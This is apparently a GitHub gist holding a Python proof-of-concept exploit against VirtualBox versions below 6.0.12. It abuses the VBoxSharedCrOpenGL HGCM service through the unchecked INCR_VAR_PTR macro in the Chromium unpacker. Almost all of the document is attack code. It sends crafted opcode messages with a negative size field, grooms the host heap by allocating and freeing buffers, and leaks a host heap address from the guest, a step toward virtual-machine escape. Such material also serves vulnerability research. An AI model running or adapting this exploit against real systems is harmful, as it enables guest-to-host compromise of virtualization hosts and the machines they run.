| # Author : peternguyen93 | |
| import sys | |
| sys.path.append('../') # back to vboxlib module | |
| from vboxlib.hgcm import * | |
| from vboxlib.chromium import * | |
| from ctypes import * | |
| ''' | |
| Affect VirtualBox version < 6.0.12 | |
| ./VirtualBox/src/VBox/GuestHost/OpenGL/include/cr_unpack.h | |
| --------------------------------------------------------------------- | |
| #define INCR_DATA_PTR( delta ) \ | |
| cr_unpackData += (delta) | |
| #define INCR_VAR_PTR() \ | |
| INCR_DATA_PTR( *((int *) cr_unpackData ) ) | |
| --------------------------------------------------------------------- | |
| ''' | |
| op2 = b'' | |
| op2+= pack('<I', 0x28) # size opcode (we control) | |
| op2+= pack('<I',CR_GETUNIFORMLOCATION_EXTEND_OPCODE) | |
| op2+= pack('<I', 0x1000) # size (n) | |
| op2+= b'A'*4 # padding | |
| # op1 = pack('<B', CR_EXTEND_OPCODE) | |
| op1 = b'' | |
| op1+= pack('<I', c_uint32(-0x2050).value) # size opcode (we control) | |
| op1+= pack('<I', CR_GETATTRIBSLOCATIONS_EXTEND_OPCODE) | |
| op1+= pack('<II', 48, 64) | |
| op1+= b'A'*0x20 | |
| msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
| msg+= pack('<I', 2) # number of opcode | |
| msg+= b'\x00'*2 # padding | |
| msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
| msg+= op1 | |
| msg = msg.ljust(4096, b'X') | |
| tmp_msg = pack('<II', CR_MESSAGE_OPCODES, 0x41414141) # msg header | |
| tmp_msg+= pack('<I', 1) # number of opcode | |
| tmp_msg+= b'\x00'*2 # padding | |
| tmp_msg+= pack('<BB', CR_EXTEND_OPCODE, CR_EXTEND_OPCODE) | |
| tmp_msg+= op1 | |
| tmp_msg+= op2*((4096 - len(tmp_msg)) // len(op2)) | |
| tmp_msg = tmp_msg.ljust(4096, b'P') | |
| client = hgcm_connect('VBoxSharedCrOpenGL') | |
| set_version(client) | |
| client1 = hgcm_connect('VBoxSharedCrOpenGL') | |
| set_version(client1) | |
| buf1 = alloc_buf(client, 0x1000, tmp_msg) | |
| buf2 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
| buf3 = alloc_buf(client, 0x1000, tmp_msg) # free this | |
| buf4 = alloc_buf(client, 0x1000, tmp_msg) # msg extend goes here | |
| print('free buf4') | |
| msg_dispatch(client, buf4) # free buf4 | |
| print('alloc buf4') | |
| buf5 = alloc_buf(client1, 0x1000, msg) # locale in the last of heap | |
| print('free buf3') | |
| msg_dispatch(client, buf3) | |
| print('free buf2') | |
| msg_dispatch(client, buf2) | |
| print('execute buf5') | |
| res = msg_dispatch(client1, buf5) | |
| print(repr(res)[:64]) | |
| heap_address = unpack('<Q', res[8:16])[0] | |
| print('heap:', hex(heap_address)) | |
| hgcm_disconnect(client) | |
| hgcm_disconnect(client1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment